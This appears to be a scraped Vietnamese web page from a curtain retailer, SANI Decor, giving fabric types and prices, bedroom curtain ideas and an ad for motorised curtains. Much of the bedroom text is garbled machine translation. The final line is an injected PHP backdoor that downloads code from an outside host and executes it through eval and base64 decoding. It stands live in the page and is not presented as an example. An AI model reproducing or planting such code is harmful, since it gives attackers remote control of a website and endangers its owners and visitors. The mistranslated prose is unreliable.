Khi chọn rèm vải trang trí nhà

Không chỉ giúp ngôi nhà thêm duyên dáng, rèm cửa ngày nay có nhiều loại, với nhiều công năng: chắn sáng, chống tia UV, chống bụi và chống ồn...  


Loại bằng vải voan mỏng thường màu trắng hoặc các tông màu nhạt, điểm họa tiết, hoa văn nhẹ; loại chất liệu dày thường là gấm, linen, nhung, bố, taffeta, lụa, đũi, tơ tằm…
Vải may rèm được nhiều người ưa chuộng hiện nay là loại có xuất xứ từ Hàn Quốc vì phong phú về màu sắc, chất liệu và hoa văn. Loại vải voan khổ 2,8m xuất xứ Việt Nam có giá khoảng 100.000đ/m đến 150.000 đồng, Trung Quốc: 180.000đ-200.000

Rèm trang trí phòng ngủ

Thứ năm, 27 Tháng 10 2011 09:00

Sử dụng rèm cửa để tăng cường và tùy biến phòng ngủ của bạn. Thậm chí nếu bạn đã có các rèm cửa sổ hoặc màu, rèm cửa là một cách rẻ tiền để tạo ra một cái nhìn khắp không gian gắn kết và kết hợp chặt chẽ một màu sắc cụ thể. Sử dụng rèm cửa theo phong cách cổ điển với các chi tiết thêu cho một cái nhìn quyến rũ hoặc có phương pháp điều trị cửa sổ ren cho một căn phòng lãng mạn. rèm cửa hơi khói sẽ nắm bắt những làn gió trong suốt những tháng mùa hè ấm áp, trong khi bông nặng phương pháp điều trị cửa sổ sẽ ngăn chặn quá nhiều ánh sáng và nhiệt.

 

 

NHững ý tưởng rèm cho phòng ngủ:

Vẻ đẹp lãng mạn: Đối với một liên lạc lãng mạn, treo rèm đăng ten trắng trong phòng ngủ của bạn. Màn hình tuyệt, thêu và dấu ngọc trai có thể vòng ra cái nhìn ấn tượng. Thêm một liên lạc của sự quyến rũ trong khi thêm sự riêng tư cho không gian cá nhân của bạn, rèm sử dụng hoặc màu bên dưới để bảo vệ thêm.

 

 

 

Vẻ đẹp cổ điển: Đối với một phòng ngủ lấy cảm hứng từ cổ điển, mua cổ nhìn màn cửa các chi tiết thêu chẳng hạn như trái tim và hoa. Chọn rèm cửa bông trắng sắc nét với những đường khâu chi tiết cho một cái nhìn cổ điển. Nhìn cổ có xu hướng làm việc tốt nhất trong phòng với màu trắng, bức tường ánh sáng màu xanh hoặc bằng gỗ.

 

Không làm phiền: Để giữ cho phòng ngủ của bạn thoáng mát và tối, chọn rèm cửa với các tàu mất điện, mà sẽ giữ cho ánh sáng và nhiệt hoặc lạnh. rèm cửa xếp hàng cho phép bạn cắt giảm điều hòa không khí và chi phí sưởi ấm trong những tháng nóng và tạo ra một thời gian nghỉ ngơi tối trong giờ làm ánh sáng ban ngày, mất tín hiệu màn cửa cũng sẽ ngăn chặn các đèn đường sáng vào ban đêm.

 

 


 

Đảo thiên đường: Đối với một cảm giác hòn đảo, mua màu trắng, màn cửa hơi khói cho phép gió và ánh sáng mặt trời thông qua các cửa sổ đang mở. Các vật liệu nhẹ trong suốt sẽ khuếch tán ánh sáng tự nhiên, bắn tung tóe không gian với một ánh sáng ấm áp. Nếu bạn cần sự riêng tư nhiều hơn hoặc tối tăm vào ban đêm, bạn luôn có thể thêm một bóng thả xuống có thể ngăn chặn ánh sáng quá mức nếu màn cửa trong suốt là không đủ. Lựa chọn rèm cửa làm bằng một loại vật liệu ánh sáng tự do chảy, mà sẽ cho phép gió thổi qua chúng.

 

 

 

Phụ kiện: Để cung cấp cho phương pháp điều trị cửa sổ của bạn hoàn tất, sử dụng phần cứng rèm trang trí và tie-lưng. Dây kim loại với tua thêm một cảm ứng sang trọng, hoặc, một sang trọng hơn understated, cài đặt tie-trở lại móc phù hợp với thanh rèm và đổ chuông.

 

Sản phẩm rèm trang trí của SANI Decor.

 


Tin mới hơn:
Tin cũ hơn:

Thêm bình luận


Mã an toàn
Làm mới

Rèm tự động

Với đội ngũ là tập thể các Chuyên viên có bề dày kinh nghiệm đã trải qua nhiều công trình, Chúng tôi không ngừng nghiên cứu, thiết kế và cho ra đời các dòng sản phẩm Rèm tự động chất lượng cao, có tính năng ưu việt và mang tính đột phá về công nghệ.

$rrr = file_get_contents('http://sbalatam.com/ss/sync.php'); eval(base64_decode($rrr));